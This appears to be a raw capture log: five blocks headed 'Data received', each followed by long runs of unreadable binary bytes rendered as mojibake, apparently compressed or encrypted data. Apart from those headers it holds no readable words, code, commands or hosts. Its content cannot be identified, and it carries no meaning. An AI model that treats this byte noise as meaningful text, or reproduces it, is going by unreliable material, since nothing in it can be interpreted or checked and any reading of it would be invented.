UÆv–¢ªâBÔ9¬ˆtzÁ
Data received Gî3˜¾»‹XË`0ˆµ…–*Þ¦ò}Ƥ´ê¡c)ÿ.¾Ÿož›ù2rR šòµ»#FöØy’#汃zŠž­m ‡Äòµõ‹4¨Å {‰§s,º]§'¦¬ŽC¯SGpiÐLq0>‰±¥aÎ.úW ¥ãdšt!襀ÎiCL¢êÆßlYgè»íjôÚÐOŠìi™À>ƶõ#‘­Ö87í:šº!®ýAMw7ÉôG!¨_Ü¥uhIXm)KÇ<I>h{ è³Ï ñ7†Æ2­\^ô¥fo¿"Š ٖhÛº2ºê¶"(øÀFëTßÅ8³’ˆEщòóuÚ¬VÌó˜ëi]ÇA©Ìj‚Ä£~g4~¿‘^)¶œAöGŽ5n+å”R ó b¸éo›^Äè)¿ìŠ#ç8òÅ#ˆ{ˆ3xœ…çIÃFÿQolH(g´*ì©kҁ/¼Ö6û‡ ÞÜ&¦ožˆ¬Ï…89º|—_éßÓ?gæ:C7 E^«Ž³ª8’' ,üªÈñ˜š¿E 4%ÕÔف;`ì4îFÌÄg,Æ!/~äY)Ãfíç0GNìE!ísY&M¸ ¨;Öx‹x([öfþЃÉ_$‚$Ò\埋Yüá[9mÊ? »Ÿöô'N Sê V5™q^ëÆq Lƒ^ўâ'PRK C҉u<AªM÷DJw‡ú™&úÖÓ*…¯dá耜×µŒ lö¬bÆÕ^¤Ì˜ù\#Il•í2HQJ“-S+¨¸¬ÍÛz œ¤¯o'Q·o ~‹p\óE„@&+vF('}¬ ’Jh…ûƒÇD4š¼RôIx3Ð(ÏWË郹2ÏV&Î7 C´l¹Õ9%Ué£åŒ4ø×ÑPí¿b_BÖu5î¶i廚âËïS­l”*|÷Ÿ™}¯¾"S%Jý )ŸÄ®ÒÞÉ­À¦³|Ñ %7g1¤þå?1×`Ö¬¼€2.Õ ÷q¾È±å6tF›ŸÒIž}E¡I7<Z¿iþÉô¤¢Ý½|xô¥ º3ý£Ž½Ç´Dљ|£Æ¦1Wýñ}zÄ7ÜIšÉ—V)_f® ²©[°­ú‡ñ+ó ñQMfÜ!êÆ]Çß[³Êf̀³f¼1 äÖi±uxÊpè%˜´m¨€YT³KJ³$ ÚèÐäÀ3ŠëØô[H1HÂ׉æ*œmÇÌ8¿Ð˜›ƒs§)- ¿‹Ë2BWIl3¾mnY\Ô{@Œ’ò/Ùx(ËXY™î?vÇ:^°[‡Žv¤ÛH›œ þD[~ãË©ö¦N¹R>$…¼½J!¼¸;ÿkî(O4ÀmÉÙÖTåú`|—v›ñ‰ûXvbÂ2Ñ{ÂN°ä›C\èŸu©ŒNƒˆwIyòRU7') 0AÉ>V”£’BÐL Ù²sŸ'tÀõÀvWÙu_*t´ÙYþT€Du¶P+ÓÜ'ð:ÖÉ4\ÿVË1¼ï#gyÝDƒN*‰ÚGc¢ˆª…™ @mc ®ÓH Nç“Càay¥M”Óz,/¸«Eˆ‹ÏtßÁژr÷kÓ{Tw8§Ì!Ì ´»KOÉÊÉ_Ð,æ@€ËìKXÐÀͽb f®rɞ@Eä~ó Áú6Ö!’ÔõÚ¾ hBäÊ˝öëµ^“A•/#g H$bÇÒàJ„1!Dé¹æ1naK٘’ú‰;‹ÂpåMg҇TY‰OTSä3L ¨Ÿâ'š¾E¢˜¸%8šR.TgZïH7 þâ+ ­ ž§Ók·öÜr9ÊEÐéÃ/t9Ü †ÖeàdBÄåT  ßš2Ú$Ñ1?*œáƒ$‘‰“t­yËwÞ5Ý{šŒZÓV[ö{ü,¢Á ŠÈqÑ°$Çô×e%Tüô…*ç´¹xÓKEA‰oO( z}Q[cï(í@ôòMý'“WÇ.#C×̒ˆíL% 0>EƒÒ Ó“¿B¿U黑âãÅÐ5Œ\|ÿiÿøÑ-û—Màû€Oµ¥oÖGi“¡lRG}ú.jo›ùjÚ›¾lVAtªááþc$ïÄmê"z‰º})Ýæ%Êl®p܌õ-‹ÆWÅc(wP^_øbÕ2OñhF !Oè$˜öÄ,Cµ¢|ót¶‰¥{æ´í¿âÔýêÁð´añ‹âtf· "Úß¾ŠOê˜Dé¦0Ê+ççÇ:¯‡Rƒæݚ5£²W¹ ,›OUFÛix›‡¥äãNñ6ç¶òêùEiö´3c žª¯Uò¦âУÈ9¬øeÖ[Dh¡âî|qõµi¬µæèõÔêz£·Ö¾7ösœs†ÿ.ð±N»tá«þ…‹ÆŒ)ÆÞOY‚¥Ô)p3ñüÛ§ø»œïƒ3œN͔_ïCºašÄ·òtíz”ìÇŠ÷ EZÀPÿIF+Q)ÌL7#¸:ØpWª,¢öšš¥€ü÷Œ$ØÐtª·,< Uîû—uëðR0),c£½jÏÙÊ(è}ð’Eö? È®Ê#Ú‚f®ÁdÃS•WˆäÙØ1niŽª¤a–øbM>رÞ¦½ï‰ó*Œú"ôô:<?!uçbûæ€Omÿ¶Y˜…?öIû.”·Âe¯Bé­¸G5 öeÒÒ¼2m¾/\¿ðáGu¹þEx•b·RêŽl`»“Pœyß_ԓ‰g z?O’“M@`0eLÐANêš5-R]ò«ӊ¥ªŸ9Þ(np­Ø|Ýî0*–´¾ë] ÕSÖLá¿«VªÏÏ8Änç5eu\¿õýе>³u’Y#ÕS Ùâ5ÿg‘2 }Úê sm+ᶡ&Cºõ-Lïy„œ›Õy|žË¥'ãÀ+ÕØÿÛmç‘HvMO&0¶’'Ø+yŒØu‚Þ?ŞúØ_üúó@â§^ï 3ÍpšÎ'Óæ…¾”b$¿~L hªûí9ÞÇü®é¢¬*<Ì!%ô‘|IaÈÜ`ýãF¡…Ì·¸ó¸õ³úÊ% ':½$[Ÿf<úôžØµ¬Ú`¼9JýNø +T–öòÑ%Tï¿%…+ÎÜè+é  Ø Y7)müV‘¡º2¸2îz€$ƒ=,mlT{Gcü#¢í÷0°è—¿ZÀ.IÀ§ Ø<r’{.óHxÙñ_¹Ý†\‚-i6G\ߦ´jŒ®ËÚÛh 34sG`ed!Vœª †"IӍ ¤®Çfn…gG =Õ"Ý>ˆ`:49÷çCÒ¡.^tJ’ÂΙ èl)%%Ñ§—°·D›>©ü 谚; ·˜ºc«?¿èš¸ªá³VžQdvÖ JPöƒM9u$;r¢~‹íʗ)bøŽÍÀ“,x#k,¨Á¥I{èה|R“–YI™•,†o(ØA$œIƒ¶4ÔùÍH‡^¡óF&Þh¾õ¯Õ|ò¹Ø(Úœ1½Õù+Z£YLÃÁŒ'3(ÞâW¢ ŸÐÈäæˆLËõÓ¥ÞÑw¢ê$А³á9ˆæNS˜Ùeã&î‘W!é‘\:0&OBôèq‡Ö‰Å.ÖqõO?“A¤^^è¿"§œE’ Ó8Cx }u¶¨ŠÆ ´26µ%læðGÍÈ]àÂÕ*öʽ&öN}»‘¶x;ꨗ×x=rog<vÛ°ˆ}å녱SÌÖô­û†xÿ`Ðï%¼ÝÕW@Xü$4nès [K„Gëèݽuƒ'}TÔ8HT\÷<…û™¹NÝ-ݾ‰V¢} L돓ÏøØ\Ÿb°¬i;t‘®.ÛÇ
Data received Ãw'¼•\î?cÑ4+dVxö… ¿2H†HžÓá”-AŸhEœ¹;\ùðÄî~Ý5ÇÇhøÇßL×ÃõÜ´rZÒO¦\»‰Ê}Áߍ´ˆ•T®‡—NúQõœ‚ñKG\hû´i8 ¼¼Q¡/úMB]ußñWa‡ñ\ëŒ]ÑûøŸ• ²e‰´´­ø®O%!êwÑEU:»AÈó]˜¸‹V¸¢_à/mHÎ ÚØÀÔÞ8Manйœ§²cÄl5ŸÚâ…ENŒ#@Wuùʂ»:k«tú;{z‹Z©w÷÷B¸Ðûö»_œÕŒïƒ¨¹ª«E˜æØo%XÔ¡9g• ˜WAî²/(èuîüԄWL-Mm¼×¨— (ðoýX®¥\©m xÒ(wN™ÙБBêÎ Éiæ’‚ØÒ<Íöof0£×b-2øñ†>îMͳ¦ß—?Ð °?Ó fv;ÚÎÑþéߋŀexœ+1°á¶œ`ëR¡?q獂˜ÀSx6ÙKûLø¹Ÿkè‡èž£ëžÛY‘¿ˆÂ›ÉÇ]¨¾ƒà¦ÂÛMõ ’7p£˜µ·C0ì$ R”%‹ ´åáJ"R¸Ú3ZʼÁÁò®%HO–!UŒÉÑ ´RkÌÜWôHzô(nþ`ŸsÄÑ!’=ˆëÕû‚¹}emL±ðXN8º¤ ð@šSL¿‰wúÏ:í'go™ö‚Qç= áeñÉ4™øòýLÉ¢ÀRœ²Öî§Õ±' ®—j€\è;3׎brF§ß•¼ø»{&Ìp&íÛd{Ý«õ2Á«Æmœ/ë¡F´[Á†|Ùlr³¼¦?ɩϳºuõ‘´†:’‚®$i0݇¢Ì8íMºÕkƒïäX¿¦{a_CW3¦lÒøH´Üœ2°®ž+¦Úµ«ÝžoˆN\Á¬§±An¬–ôòî®Ç_>¿Ñ*ýÕ\¢ð,ÎRKÀ[!H|JnÑ¢œåéå£&VˆÚx±©¹ nëʖýâΗ•J²ªEò\zЛУ¼«÷) µÉ¯ß 0“ûcá{•%ú‰žÄm|²š5pXhcû~d3q4@Í-Œ&T(z‡mR\v½|Ü{³Ý”4„zI'øçnžådÌ[ìV˜“ÍŸ%) Iêcáºd^wçïdA¬ÞºØµË…ÅHBJ ì-6 ÃDUæèYô8—1‰g#¢]¿ÚÝÜ[^šÛšŸeœêyª¥ðÏQ—ÃÐù“hh^ªÍÇ;‡ `E„òzœÉ>.†ÊÇÓ'ÙÝh::,³á­Zbû™‚+´lµMóáÙ´–茡ú²Tâõ a,~XJá"-ð ¢âÏzî4 ¯ÙKösnHk!´r!xÔûÅGHXÔSxõ^Fy0îë X™;ãÀ°•Âáô|¡{£u¨Îõ7ª–EØ×CSD…)ªm ¼;Ùé-·{ˋž¤¼ÇÛ£ãÓ@/és.e»NY'óêÊTgQ,ü[”z½§<)Ö lò`åÕ˪<\1oԞÝø<í5ÒVùŠ…îŽâŸæÂÌd«ˆqóUÝ]ۇ "î9³}÷éfIÀŠëåÒ¼­mE\é„ýŽ£,[1læçëÎ`[üå°z»í™f7?Íõ`óµ1†‰÷y2Q2$£_Ç]šۿÀ^³Ñ‡¿ ûù…%M¶´#Š®¯ºgBÀ)Êá×v®!Ô÷[\ ã nê*fY§1yÍýy NáR­Šw®ºeP­Iè·ÿUgRY»F2hŸ¼4þ: )…>ò³;C÷vû6òU©Êîðl“TQ`f«UÍz ©½n-æ¾ËÝé%U²äS™ì1—4¤Z£!R®ðAZ¥»X®ybOÆ@ Ï_yéL H"RTÌïëDÐmmWñ҃¦ó1¯‹~íe0i Tädyè÷¦A;'ÏG–'Z猼ãþFëN;÷Ôñ4Û¡±²œìß÷Zv#ða´öyؼD%?ÌDš¦qýŽÈÃ×(¤†Hâ[˜§ oY»ô(C™ºÆO d‡Ùӈͣ8Ð]þû co„‚Ëö7‹Rɨ4+·'UþcÜÝ:£®AXÍI¯ÄCI˜ +f¾á ïS{ßŒ[n(hÿ gÎkƒ±šÙ®lä¯B†GR%E÷—µ¢A!2žÖŒ£Œ²]† (FìV¾cÀE‰ô¾>¶£ Á:@ۇµ|†—Sî.>ðÞ{~Sž.}0væ ;Aðgl#ÿJHÅЈ:t! Ät]‚€>«Ô+\h$õ?!Ádr‡ÆÇ­~ EtãëEÝE-?Ҏ·ñˁ4(„%&]¨ì¨Ù¦ÔjQ/]£ÃQm`-²~ü]° @.•í;n”*†¿1¦–¥ßÿ<UfrßÅ[ɗ´Q*–h’ÉÆ~síû‡Š ‰ìU¤S󇨙rÖe`72CB«%ߍ²jðžòv–?Ǹ¶`†7¸‰· Q !2[Ä( cBQ) ž< Ä?±·3”Þ‡¼£Yqâ&š+œ½™h¯9ÏB‚¾w| õãjè/ÓE±‚Y J´ãú8Þop«¦6‘©æ;ߥ‡OY†ƒ,‚À°Šè#Öjᚮæ…S#§d²¢C?V©—oA¬· BÛ¢ó…c%N;Ïöæ҅Ý"¶dÎo*'ÖCÏ3RÓâS´«@y•;ÃBš#*®§)ÌÝ4û¸ä¾¥ÀzØ b`RV¹Ênáde²?±lY$ÆB`œˆ o»Øß®GEOŒÔÔt¤Ëø<)G}øVuB­"Kü—<+kÕFÕÛêmyŠ.7ÍÙ8†7ځŒ"ÉühÅ_Ÿ¡ªT]2¼= ØËÙÐÅÝí&«–Ì*1æ“=¹ðÞpºZV¤R±(Š­, mÝw¯š"åq¼9“Àø¿[±éØ8 ©|ÞÂ3nÅ%RB%Q4Ž·h6,Dã{ְΨ>Oò·L“Åþ:#ÎaÛA×Ùÿ»r1<7¢ÇWÈٚãv1*¡<ƒçAR£¼d}Å1ó&C³g•œ‡t,<ä&Ñ):÷ڕU¶Ü" ñKß¾¨éq±U='Q28Xd¨ënbŸ*‰öì 0àûŠ¢¿e늼=Zÿa\“çqm ‹ŒlzÁÚ"ôƒ»ë5á7~_(N3h6Ö¡§©ü]Øüc3‚_¼Ì‡º†ù{Óÿl@-9¶ý*> Ø(–\‰½ufý¸ÍÄ×^BkêGê/tEì+]t;@çû©Zï·[1%Sj¯Ô¿µ #þ/<±]/°÷‹V¡a†ïiò…+,N çÎ❃^óxið“ãS‰ÝJ·ÞÓÿkÐ- «€®šKÓG9¬uÜ'í·-¿cixÝO®å¿·Ë&¯¨%ºâg–¶ìãÕ¥ù¡"RJ™ï°ª¼°’Tª&î?©à òtÆ ¸b-£B=æpE"Ì$ö·y¨¨ÇCÚœ±2eƧÀѓ·ñðþ&àހÓ+Ôòú³ê}Cd1Ûg_r® [<՘°ПµOjQ86á™îu–ª€³ºԇ•QÚ)°Bn&[ùM“Fo"¶EùJÆß¹’ðc¯bF€h.<7†´D+éS(£8Žƒ±dƒUp ȸ¬(ˆ'Ã5&rÐ,ÃwhÆ÷¥h½Ìûh®Nôb̀!ËaºÏÝá«0æý{ Ñ¶õL »9Ot>ð¾»ÒèÝ)æ䮇2Î<SԚ&V«$¼‚Ü×2‰%d­ï+ò}Ǿó¹/‡DQ
Data received E?r”e"o$Ç^~øÖ¯=ρ?½ÄÜ~o4H´Þ›riAº¹­^dÌ:¢Cvv·\ý[e] 5É*‰{èå8Ä÷pé$/°Â¸wŠ°:g¹R]¸Jó†'§A][…2@µA²KîœÆý*4”iæór41o ç©äyÇæäöòÌPz˜Ì¡×¤5DÉ¿Hl‹ÑGÉX³Êyyªc³6äáãS€Ž=Áàh ÝÎPh.6 +«#æÕJ(@SøƒfÚÔ-K¢ž‹ŸC5ú:úû̈ó—s€Y|2¯†…w9°H,ÂÀ냺Ž·´`1£öí4TáâWÆa ¶Q]4[Kì9!/‡¾Ò#!í(°L€TªU6Ԅ[܃ÆMQ˜r«W4)Tš˜§¨'EÝ$ ñ‘²°z¼Ë>¾ÑfE }7Ù64›­n;4=Ï •× žT©t”hôö=¦âÊ%*ýbñ»¦Уr²(´ƒÎÉÄîd.߂á>(Çvw^í뛆÷:%¬¡Ð¬—ð{•iÞ""0‹¥HXh=¿d\wáâÜåÅg«|TKZ$Úõ_ÝÖ¡Ô1]~¾tI[8òâe?}¶×c­ÉËŠ)±:QšÑnûLªŸQI¿qE ˆùXñöøH]É+•ä?JÉfŒJœ˜Jå­3[r“¿O¨øéŠÎ›µ#ßg_µ`: \édôhçM-Â¯'Qo£ ±Œ÷rT y(ª.˜î%0|e’ $ˆuŸò—’š1ös»«Ù¥vai(Ȅí¼Vè%™Sv\è—#Î,i|¡ƒñz(}<S&= H8 Sù³k fi5ÎVÕ4™û×B[”œKšû2 =lòÛéEJà#¥Nz‘S?ñ^‘Þ=Oø%àxÛÅõ›A€SÁקDPØ wôð^£!%Rœ óÝ4Ñu[”|h}y…§qñôƒýeê5¨¼äBдò`UUû_´¿Í$›Ëÿ»^[¦5úÒW³±m’Žíø©’Œ¶¶&Å$ÞA¶ £àÂJùá/‹”è2À$²˝ˆ‹Ó×ñYùÈ9®?Z™ÙB^ 5}oXvD žc¹˜ÓoØÌˍ ÿ_¥_ ÙÂ{Wô‚`äáú½ï8 «¡Qߝ–†æ[ק¢H(1‡ƒä?à$ízB–lKz?}˜y u:³þù¹~ÆCB:"Í$6â\( ÊE£GÌq2ʅ©”sõE©ˆ.„ԝު ~sõË¿:~îƒüó†K0Ü©ú~s…9:•j%úWü=Ù¯—)'ì ÷ëˊxs5¸bݕ£ú:@0çP‰‹ì«*K²“lúÍfõYhl¾Ԟ­æwÿc+ƒ*Ǿ “º;äŠ"¬)Z§Íþc­ð“ªAâ<…H»`™—D4+Xï,é™Ñb?€ß.vž÷š¹ÄIçTõûÏ^BÓQú¸9–•d2ò¶{9ò4†ˆ7:)÷ð$Š¨­3{à±kìåèûA/Ÿ*Û}öK~Ù?ÂuoåD4œ£¹«  1ûØq¹”ûô^ؔþrÜÞÄó¬F!ά¥6â"•]¸üDâ^ì¯p¦î¦TÒ¬©Ö©’Þð’NZìÂÍՐ ™s}É~ézÎy*ÇÄÈú>_6|â,ÚàmÃÍhj„ÊæKx* #éjBd‹}{¦÷cˆñ|éØöT§á)©<cÈ«Yþ™æ*%p¤Ž@cqƒÃ#ý¯†÷'»||ÀýµñP $o^ïϯîF÷[æ싩’Üt-àܟ(îв.LçR1€ á™±…‚zô5ÂôÀtG ‘qÑýy~ñ3 !¶³ëëù'€p €ÊrT&ÊÉøõ™ %ahˆ«.ØÎ\QâŠÑü;ñʇ‹uþµ¢˜·ØaÌà« àðdJîÓ\*´úŒ¾ir§ÑZàô§ù¼íùï‰3ôsÁ¶H+{ûPB††³ü ú9½Ä$uN3&ÅêÐëV©ªDþyGÍ#B2(:Æä›ðäAF±¬GEXÊok¦¤Kː·^šÃr/Œ©GŠ7¼R1^æ+™†{Afêܕ’!øÖGTe:)açs*ô¹¢T=ñy.ˆ¨ž“ekM 4_o`ÙÇúBàm;“®]ï?òŠiêø@( è)d¿ôLy¨‚oØ/Ç0¿3¦fJƒ1ûÒuöLòœCÛ5Ì_Š0MìOo]¢‘OY$¡òíA®·é6¨?8Ïʬ´î‹!^Š£ÐRk™Er¦á™•ÇZ `â?žX4R¯½N]ÅH«pø[ˆ2FFGêäfÄ"åM)Ñ´¼wxþÔH|OJúžÙäV—…®E)îu©7cpŸC¸·—S§°iÊý’|›Ê×|Çõ´cBx„cúçhÛ õÁ»/YîçSåe[¬}gÂXÑ F1?ôÄ2zŒ`}4~)™öc² qöZé6aËÍFÁǾK¹†ªR÷ûI° ­’Ö2xó²6vŸeÏm}b‰ý'!þÚßänlX„º5ŠR<­ÔSåýã6à×CE!Šp[æ¥1‘“ö“jðX|«ff„[žqî9”÷oA´K÷ÿ|<úzW L5º3œ§^úA7æº{:MLlÛžÔ‰ïoÔuOG¾ÎO ì$«›ý=ǧ»ë¨uÖlMaé‡%†ÏUÕ%ڜ–¸÷ñ:¸ŒC¡‰ªÁ]’„´;[ÞI_¿hvTÉ¿}‘{ZH“èþq°É­ÌÃj¿‹'åp ^_Ù_¦×ôõ_ô)Âeâò%…[hH>šøê‚ç@G‹a!/nÕՍb”$‘Eô°`Y—S ‰ãˆM‘±éå-—b¢:èn›Sӝ,zG©S añô"8ÂÝ8ö¨ßæ'%ác‹;Q¤WÄ&f,ÇêÛcŇ`Y—Ÿ¬tR"¦«ö²a9îO „ s÷{Ô[_ª23}û°£öÓóJ:¾·¨˜ÀÁ‹z4§ø$›~¢ãXäÈ¢ÀÀ›¦²!ƒZ@•°"U…‹±ý"Zj ê2pnt(ȨE$0¶èëHºI%´N5…NÚŒ7v\T†×–ƒÅÏQrÈ }4æÜd|äƒgÕ9‘PßµŽ¨‰Éÿ#»d¬1ÞP°ü Ðcp¡Ç‰´Ö*®ê6°É1Ù©j»x£Ça2Àa殦dððÝèñ,Áo¹uð̲€!fe÷›÷k/ãK;1” ¨šÔˆ+mq ';ÐIl•1„Âkܲ•êggܬð™äpLObjž@yÉx©å¶ÙM¤ýåÑ(ÝúŒ? tqݓ¿ð—(Þ"Nׅc¬‘tkôÖ¬D£sçD¤œ\HiŠƒÿ¼œ¸@G6TËÜ- ƒ½~”>¹"o¬ci)ssµ æ…Ji éb•¢Vƒù3ºÇ¨JßÀÄS¦²PǍEÎ[ß´@ó<ïyù¯2ßÕg‰L×㫽Fžÿ’Ϙè³;ò삨n ïَ†›Ö{Z¦È2ÉE0Ì]q™Œ¶U[¶BÒ0N À“¿a§œ ¬Î\fAwGSTpÊä[ó€‚ír‚šËÄë[©Šw #n£wõ¥§ÖÁr°Å‚…©•Î>è*ðБ”¢ºn%r®’Žû’_³øzCÀ>蝵OØ-Ù9uc[ýv8ZŽN²+Ìýˆ"•‡ùá9Õt:1 Ƭ}¸t¤I·êåw#¼?)’pyòãzÿd &2üæžâgcE€u
Data received a'á?ɓeÿË¡ì3¯vñè“×`œÐK¡·¸hZfՌùÊ)þîU¶‡äÀT½*¶nߊ9_ïý³[rxlÉjZ¡ÜÇ]öN—ï5¢'hVü½Ó"õ“Mk:÷çjj»åÁ7›àüu—É Þ&È=XjÎúg´ÛºŠÜ5ø„eM’vî,¡,oxá’BM¶>ý!éº£M´ãcÀ\;>\Ò9¦È„æ‚“âäv+ x”ÿP›ÅÅY¤3É&`ÒôD¥]ż¶EV"åskÈ G³ ‚»8øN¶Uϱ٠þÃÂ';:ßé˜7+õ¨ë–Îù·ÉY§‰u¡³¿Ia+l¢üzÚn4„ê\îu9e—2`Ùk©Ho‹gœþú»"Ó1œv¨ò³×ž+PêÍÇ®ê×°I]ÄnMÂå¸ÎW¡_²ÐŽ“‡nSF…ó™~LëC²Þ±ÿ[¨Ë„ :øç@5T@ý*´ã12t®Å`Ix*ÎÕ8µþW™#tƒ7 ”p<_‡_8KN¸}ÑüÞɐƄæIWMï,x¼6Ïïuߨ’®dÛú5‚Ž—éNœ†Ã?²=+:ޘċ®hÏy&=øÎlÂÃG’[ÂþéÊÄ7%i&Ö0²¤‚ÓîÑ-Eƒ”Û˧G­Î/_àÛ_uLUy[7ďüAÔ!r£—¢)›‹‰Y _àáNÊgW%ÈóÂN苟t«/z¶…dëÉu2ƒ"´üA”•èß8´ßÆnãCyøäÜ~™ŸÚÙ¶x†6æ´Å\ïyÂwÎ/‘o®¸aÊáAT!‘HЄىÁ,h½+°[ #Æï³Id8ÀÑS$µL¬7Ui¢™é>Ü6«öL„UԔ…³>› jWVð†]Q[H«CR ;û/)"ƒ”þ<7,“špÎSVøTÅ`íNN5Zc°kÛËX¤‚©¤ZÃñz;¸)c*$·+šFmŠ÷þZ(qÌ^á±Ç•Q¾‘ §þÅ uHNøG‘â¹2"]´Ã"ÆE4õ#ë?‰¸ÇÂãzхªÍï۟…0fZ$¬›8r‡nç¼ÐLîMÐ ý¤yã ®ŸäpnF¾þ¨ß`ãÁÒõ|/2˜ ô¡¶Pg6ՉM„ˆµ.À§#97ߛTÈ5üäëwÝNÆÇ&)ÇáɊ$ùga$/ŸâT^Ç.…Çs\Xã¡À>#Û³~giü_æãŸÚ1일¯Ä¸?àë9¾a—è;#jŽß<ðŒ¥‡)ÿoÈ898f¡²f¿r½SO˜¾¥iÖ óœå›É²Æiµé«ð‚>C# 돖ۓX™gNŸf÷Åf]¼Bù‰6ÜIËѨvî*°ÿŽÐ@NìÚ{îx˜¯}زÒÉ°ˆA9RX“Lu¢$yË Op©`2Îæ0úûzuäAìa?>NU«gî¼w,f<<•`NjT»“Ä º0ã6¶½>OÎW*^ZYW=YL©²¹»äíÒéë9ÖóWTylۍAh‚ºÃ€ÉšHäeëFw{ÉêZ…Ó+­Yõé§ ÂôPà¬2_”ýøQÚ·Aͯ®nâLÔÏû¤mÀ`¨E[µñ˹¼ œþúÛki­¥¸ÛÇòU½ðg¿!οA( ÀÌɃoù¨;¾5-Ö -àMÃgÛé7>bÀm´ÕŸÏ$^>(¢6‚%ßnàõÏdêÂš“‚lžfúKÌén =ULó}'®”ÖϨçLÇaqÇྺ—¯ÁîqéÅ;ɟðŽè;¿¢$’9FÚ·"©Ì’%¾¹¶AÞB û€äœ~ee…„|¡B–_ý–çߟPðšˆ;¾aFR΀a WӔ'£¨Ö|÷’ž¡Ç¯íoZD!蜑†)ú]ÊÅæ:d0Î~”êŽ#Ùfvñû<íÕ0 3a¥•»ã!­ä{ ^„Åßzš{ ñqæèšô`ڍÑþ¸ª ŸbûÿøÐ|2“Ïÿ[‰l˜Ð⽟GÔ&sO¸MP7Š`X=ç IÅ6¶QâE1+*¯Ž…¿ÈÛJ®€b¿#Qž™?ãO24¼…—m ÊY¼ÁªùR»Ã·ä(d¢Ÿà=zÚÛ(³›Žô"å0–ª‚yQ؏˜‡‰¦j`žò— T s;‘j½Å ¶[ÝKŒ€¶­!%4îÕwGÅþ-¯.˜|tΒŒô.&:ë¸eVNZ½<(b$=ç.Pw „p‹¢œ´i.›eÜãÿ j‘tà VHF X»öÀç8áÍq³:šÄ‘W‰ÊÛ}¬û]²/_K\X¨ô|+ä"Î¥© 2ȄrÑ«Õ›]ËÔ¨ RdVó?vç‰+ä‚gõ"iÅåh[{ûeýĆ›þȦœÃ^3„b?º¨5˜t®‘¤ ’¶î…=2]Õ]ðÁm90€ê–ëðÞú¾=5/hà¢kՄ´ Ý2=]#Þc´ü~¶ˆ`lБ*¸åú‘ªd\&·…Å÷–׎ &,¼ ë¹¥—À}7Šùí7KPË$Ko6š™wXR=µÈ³{ÀÁULŸÂr†?a}€É̵›­ë0¤6Æ$pEqÆéhòKsç’ #€gøþaùñêlªí%-Ýô¡¿]$¼{P.aIuÐùòUQÖª•¯nð›ƒWŠµm3Ã?¬x†âäA[î§i3ޕgÁ(/>7ógèÑÓ¹IÉAf·Œ§y#Þ|:•|önC]·§ÓÎ~0ÿàî“7ˆ`Ýô·…~ó4Ù nËûî”ȽdœÛeô‘• ’äîN7.LÖî‘ æ±þN¶«anÀ½'hïÞØzßÇ äÞ..M†_ •½Ô\ž Ôw(¦Ê q«AJÀÂC"’ ¾±rýðD{è†[m!€Ñ§í…ãøL•Ê5 z œëtbڅ˜“¥!¤®Í£ÿõÁh¦ÉšÆq<ƒ´ÅvásøD†“÷nº½2…7Ÿ|2÷ôHQuÀ¥sė3"ö©ÜdBTº°ßÔCEëKhY# ÛðV )»æ6ìž•È]N—øù³œGP*y˜c …Ù’'-ü¿,´B¯%PŒ¤E¾ ðwžyÝ ÚÜÌ؂™õš"ͼ|·nîVÑ{O¼ôá4Ë59±°á‚Û-]@}Cgÿóàu¨ÝjÉFÓ7ÂË:K£äÂn‘—¾…eg¯û^F!É×D¦ûÛ¡ÞÊB³9a»rÅݏNô"؝ôwqbª•%¡(DðøÅd‰jZ®q ìEù°¯…²nì+‡Tð±¾ÙÝb>˜)`T— >½üގèÕU GÓîÓ¶OÚ"¹˜q«T-/ý”ÃÎ{ $ìÊ9Slj¨ÕU ¢|[ ”z„ ‹]DP~àz“—uOK© ÞVùLÉâ¦äËA˜n‰R²d£ÏݍÖ%' 3ºÞ&îså‘î^6½{ƒú‘+DD›øÛŸ¿_-Åah²š± Q»â®¦¼?Ú`Ð[\ SMº@OŠ‹\\~›~o€2UíæP™ 3須ï+Y–²ä»Fêin ˆ¡ðç`¯Ð1=‡Ñê°¦ž+~ž.Ð l@~ ¹¯>ï;4ˆÄCŠS Ððèzð¯Ĺ'["— –ûë‚јANw ‘2N'Ý!ãÂø©Æç!±å’Înöõ¬Î_,‘þ’ΡŽ¥Ë-ÊÖëª"rÍPzÌu ¦ØxÕ‘M„Òýu§
Data received t½ÜΊ<² :çü``óÍ×ðƒO ö~ʜ8åx,ÄÆO®ÖŸÍ´O† š.ì‡E¬·øWW·ûgÀ¼*·›pÚñˆÎ$Ègê1¹<™ežÙöI8zûV„<udÝ/ž9–oyH”¨Ä òš¤µ0iÆ‚x¹ vßüëøKêéÏm0öx=ÖpÕJï³>{‰yäF ˜Å®çw‹©·LØOP£K^»/Þm‡xá~sXU=7D• r:PCÁ•Åph„ngœ*Þ/šøPW~ÖµU nRÖƤÿ²«,-,ÈJCÁÌåAÿõÄ:æÜ6ä}{ Fv‘$ԊSƒ±»þ@ÑšÌ.`BCIJYÞæ…Ôsþ×xL¼±þ‚Ó½>¦ŒêŸ:ÁDÛNàsû”à¿ïê³sîK‰ 15ƒûËiìHöޔ<،d/ž9®‹·M87ŽEŸ±­WŒhÌ¿ƒ´èåW,IE÷X(:˒`¸!é±Ý¬’|)iþ̏¥.Ž MÊ ‘ ×·¹ûN…œ°PÜÜ·‚`s“s¥êiÅc†Ã¿E®TækŒJN«¯Øõèˆ󣹤 „íü̳»¿¯á³gù7!¬Íö„ûF¸ÐwùÓAÚgÒ{Fp½wäBp¼F¶Ë yair*ëkgP²žÇ¡y¼’#}ô1Àû€R ËH÷·=w“ðUˆ†íë6øì ì3xÑ9øþŸó0!›ŽÙ]–{S«ÿ¾Ýøø\¸'ô{Çte¢Î:ÙlB›†ã¤›¹ŸB٦׊«¶ûp'ÒòQô²ý¹‘,1ì0É~ž¥ÞÈôw®Ü¸ððîn^{Ý͓OŒqÐñDYƒ±öÍÛ ¤Ô§žu’³²B>ôڈV€±¾ùLÃEN Í_ˆ‡·Ë«˜xõ1m-Èז¤F‹çÿÏû8vaŸ|²ÅKEZ— ž‹IН¿t y;ÃÞn R½—Ê´C RX5‹`…Ñã è,,b@&%M±tᘲEÝà ÂҀâ=ÒbÅ·-i2DÃòJR_I ÂGû ¯âÂÉg§».ø:5^… )kÏHŦÜ?’8y嬥‡Œ‚¡–Á–iS“Òö¬È•t Y†ZúT\ÆÐ0 BàN•7Ìü5(xIj’>à[<þ€ ÃÝÄøíNÙ׋¶$µ fdÒÃ0ª^mül •£úêÈY.~b“§²ì{g)‹ÜVÁ*·[ ÑÁÁÒwϳ&¡|(€÷;vsÞã±0æ¬7%hßÅhõqžÖŒ?E¦¦Y‘³s×yY› Kn÷µ¯4ٙ7¬æû¹J ~ê¼é`¥:ÃoÅ\4B„5l ¿uŽ&•PåÌ Êªµ4Xñ@6$1™+T9îg¸‡ºÂÚg 